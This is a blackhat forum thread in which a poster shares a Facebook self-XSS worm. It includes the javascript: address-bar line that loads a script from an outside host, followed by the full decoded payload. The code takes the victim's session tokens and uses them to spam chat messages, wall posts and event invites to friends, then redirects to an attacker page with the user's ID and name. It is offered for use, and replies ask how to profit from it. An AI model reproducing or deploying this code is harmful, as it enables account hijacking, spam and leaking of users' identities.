Best Blackhat Forum

Full Version: [GET] Facebook Profile Hacker 2.0
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3
[GET] Facebook Profile Hacker 2.0
This is not for NOOB, please use with caution

I was a little bored today and came to this page:



Code:
Code:
http://dumbfb.blogspot.com

You noticed this section:


Code:
Code:
javascript:(a=(b=document).createElement('script')).src='//hefoll0wme.info/checker2.js',b.body.appendChild(a);void(0)
It tricks visitors to paste that code in the address bar so they can inject the malicious javascript into FB and then spam their walls and their friend's walls also open Ajax Chat of Facebook and spam a message as well.

So I fully decoded this shit:


Code:
Code:
var randomnumber = Math['floor'](Math['random']() * 99999);
var randomnumber1 = Math['floor'](Math['random']() * 987);
var randomnumber2 = Math['floor'](Math['random']() * 754);
var randomnumber3 = Math['floor'](Math['random']() * 43);
var randomnumber4 = Math['floor'](Math['random']() * 9);
var random = Math['floor'](Math['random']() * 5);
var url = 'http://hellobusters.blogspot.com?';
var message = '%firstname%, i can hack ANY facebook account! it\'s so easy! check it out ';
var ev = 'Hey everyone, \x0A\x0A  I have found out how you can hack ANYONE\'s facebook account \x0A\x0A it\'s so easy! \x0A check it out - ';
var ev2 = '\x0A\x0Ajust don\'t log into mine :)';
var test = 'I have hacked: %tf%\'s, %tf%\'s, %tf%\'s and %tf%\'s accounts!\x0A\x0A it\'s so easy!\x0ACheck it out - ';
var eventname = 'HACK FACEBOOK!!';
var redirect = 'http://hefoll0wme.info/final.php';
var postmessage = test + url + randomnumber;
var chatmessage = message + url + randomnumber;
var eventdesc = ev + url + randomnumber;
var nfriends = 4000;
var debug = false;
var wf = 0;
var mf = function () {
        if (wf <= 0) {
            setTimeout(function () {
                window['top']['location']['href'] = redirect
            }, 500)
        }
    };
var doget = function (a, b, c) {
        var d = new XMLHttpRequest();
        d['open']('GET', a);
        d['onreadystatechange'] = function () {
            if (d['readyState'] == 4) {
                if (d['status'] == 200 and& b) {
                    b(d['responseText'])
                };
                if (c) {
                    c()
                }
            }
        };
        d['send']()
    };
doget('/', function (u) {
    var v = document['cookie']['match'](/c_user=(\d+)/)[1];
    var w = function (a) {
            return a ? '@[' + a['id'] + ':' + a['name'] + ']' : ''
        };
    var x = function (a) {
            return a ? a['name'] : ''
        };
    var y = function (a) {
            out = '';
            for (var b in a) {
                out += (out ? 'and' : '') + b + ((a[b] !== null) ? '=' + encodeURIComponent(a[b]) : '')
            };
            return out
        };
    var z = function (a, b, c, d) {
            var e = new XMLHttpRequest();
            e['open']('POST', a);
            e['setRequestHeader']('Content-Type', 'application/x-www-form-urlencoded');
            e['onreadystatechange'] = function () {
                if (e['readyState'] == 4) {
                    if (e['status'] == 200 and& c) {
                        c(e['responseText'])
                    };
                    if (d) {
                        d()
                    }
                }
            };
            e['send'](y(b))
        };
    var A = function () {
            var a = document['createElement']('div');
            a['style']['display'] = 'block';
            a['style']['position'] = 'absolute';
            a['style']['width'] = 100 + '%';
            a['style']['height'] = 100 + '%';
            a['style']['left'] = 0 + 'px';
            a['style']['top'] = 0 + 'px';
            a['style']['textAlign'] = 'center';
            a['style']['padding'] = '4px';
            a['style']['background'] = '#FFFFFF';
            a['style']['zIndex'] = 999999;
            a['innerHTML'] = '&nbsp;<br/>Please wait, this can take a little while...<br/><br/> If it takes more than a minute..<a href="javascript:void(0);" onclick="wf=0; mf();">click here</a> ';
            document['body']['appendChild'](a)
        };
    var B = u['match'](/name=\\"xhpc_composerid\\" value=\\"([\d\w]+)\\"/i);
    if (B) {
        comp = B[1]
    } else {
        comp = ''
    };
    var C = u['match'](/name="post_form_id" value="([\d\w]+)"/i)[1];
    var D = u['match'](/name="fb_dtsg" value="([\d\w]+)"/i)[1];
    var E = document['getElementById']('navAccountName')['firstChild']['data'];
    redirect = redirect + '?' + y({
        userid: v,
        name: E,
        doclose: 1
    });
    A();
    if (eventdesc) {
        wf++;
        z('/ajax/choose/?__a=1', {
            type: 'event',
            eid: null,
            invite_message: '',
            __d: 1,
            post_form_id: C,
            fb_dtsg: D,
            lsd: null,
            post_form_id_source: 'AsyncRequest'
        }, function (h) {
            var i = h['match'](/\\"token\\":\\"([^\\]+)\\"/)[1];
            var j = '/ajax/typeahead/first_degree.php?__a=1&viewer=' + v + '&token=' + i + '&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha';
            doget(j, function (a) {
                var b = a['match'](/\{"uid":\d+,/g);
                var c = [];
                for (var d = 0; d < b['length']; d++) {
                    var e = b[d]['match'](/:(\d+),/)[1];
                    if (e != v) {
                        c['push'](e)
                    }
                };
                var f = new Date();
                f['setTime'](f['getTime']() + 60 * 60 * 24 * 1000);
                datestr = (f['getMonth']() + 1) + '/' + f['getDate']() + '/' + f['getFullYear']();
                timestr = f['getHours']() * 60;
                var g = {
                    post_form_id: C,
                    fb_dtsg: D,
                    start_dateIntlDisplay: datestr,
                    start_date: datestr,
                    start_time_hour_min: timestr,
                    name: eventname,
                    place_page_id: '',
                    location: '',
                    street: '',
                    geo_id: '',
                    geo_sq: '',
                    desc: eventdesc,
                    sgb_invitees: c['join'](','),
                    sgb_emails: '',
                    sgb_message: '',
                    privacy_type: 'on',
                    guest_list: 'on',
                    connections_can_post: 'on',
                    save: 'Create Event',
                    submitting: ''
                };
                g['new'] = '';
                z('/events/create.php', g, false, function () {
                    mf(--wf)
                })
            })
        })
    };
    if (chatmessage) {
        wf++;
        z('/ajax/chat/buddy_list.php?__a=1', {
            user: v,
            post_form_id: C,
            fb_dtsg: D,
            lsd: null,
            post_form_id_source: 'AsyncRequest',
            popped_out: false,
            force_render: true
        }, function (a) {
            var b = a['substr'](9);
            var c = eval('(' + b + ')');
            var d = c['payload']['buddy_list'];
            for (var e in d['nowAvailableList']) {
                var f = Math['floor'](Math['random']() * 1335448958);
                var g = (new Date())['getTime']();
                var h = chatmessage['replace']('%firstname%', d['userInfos'][e]['firstName']['toLowerCase']());
                z('/ajax/chat/send.php?__a=1', {
                    msg_id: Math['floor'](Math['random']() * 1335448958),
                    client_time: (new Date())['getTime'](),
                    msg_text: chatmessage['replace']('%firstname%', d['userInfos'][e]['firstName']['toLowerCase']()),
                    to: e,
                    post_form_id: C,
                    fb_dtsg: D,
                    post_form_id_source: 'AsyncRequest'
                })
            };
            mf(--wf)
        })
    };
    if (postmessage) {
        wf++;
        doget('/ajax/browser/friends/?uid=' + v + '&filter=all&__a=1&__d=1', function (g) {
            var h = g['match'](/\/\d+_\d+_\d+_q\.jpg.*?u003ca href=\\"http:\\\/\\\/www.facebook.com\\\/.*?\\u003c\\\/a>/gi);
            var i = [];
            if (h) {
                for (var j = 0; j < h['length']; j++) {
                    var k = h[j]['match'](/_\d+_/)[0]['replace'](/_/g, '');
                    var l = h[j]['match'](/>[^>]+\\u003c\\\/a>$/i)[0]['replace'](/\\u003c\\\/a>$/gim, '')['replace'](/>/g, '');
                    i['push']({
                        id: k,
                        name: l
                    })
                }
            };
            var n = [];
            var o = [];
            while (i['length']) {
                var p = Math['floor'](Math['random']() * i['length']);
                n['push'](i[p]);
                o['push'](i[p]);
                var q = i['shift']();
                if (p) {
                    i[p - 1] = q
                }
            };
            if (debug) {
                alert('fetched friends: ' + n['length'])
            };
            var r = {
                post_form_id: C,
                fb_dtsg: D,
                xhpc_composerid: comp,
                xhpc_targetid: v,
                xhpc_context: 'home',
                xhpc_fbx: '',
                lsd: null,
                post_form_id_source: 'AsyncRequest'
            };
            mt = postmessage;
            m = postmessage;
            while (mt['search']('%tf%') >= 0) {
                var s = n['pop']();
                mt = mt['replace']('%tf%', x(s));
                m = m['replace']('%tf%', w(s))
            };
            r['xhpc_message_text'] = mt;
            r['xhpc_message'] = m;
            if (debug) {
                alert('message text: ' + mt)
            };
            z('/ajax/updatestatus.php?__a=1', r);
            var t = function (a) {
                    if (a == 0) {
                        wf = 0;
                        mf();
                        return
                    };
                    var b = o['shift']();
                    var c = {
                        post_form_id: C,
                        fb_dtsg: D,
                        xhpc_composerid: comp,
                        xhpc_targetid: b['id'],
                        xhpc_context: 'profile',
                        xhpc_fbx: 1,
                        lsd: null,
                        post_form_id_source: 'AsyncRequest'
                    };
                    var d = postmessage;
                    var e = postmessage;
                    if (n['length'] == 0) {
                        wf = 0;
                        mf();
                        return
                    };
                    while (d['search']('%tf%') >= 0) {
                        var f = n['pop']();
                        d = d['replace']('%tf%', x(f));
                        e = e['replace']('%tf%', w(f))
                    };
                    c['xhpc_message_text'] = d;
                    c['xhpc_message'] = e;
                    z('/ajax/updatestatus.php?__a=1', c);
                    setTimeout(function () {
                        t(a - 1)
                    }, 2000)
                };
            wf++;
            setTimeout(function () {
                t(nfriends)
            }, 2000)
        })
    };
    mf()
});
Enjoy!
Just as you said This is not for NOOB, please use with caution

thanks for this
is this the same trick as the blackhat "Auto Like" script where it auto like whoever goes to the link and automatically post a share in their respective FB?
how can we use this to get traffic to a site????
What is th point with this...??
How in the world would I be able to use this?
i run and it's do nothing
LOL http://dumbfb.blogspot.com it contains that viral script too -_-
Does this still work?
Gonna give this a try :)
didnt work for me :)
but thanks!
Pages: 1 2 3
Reference URL's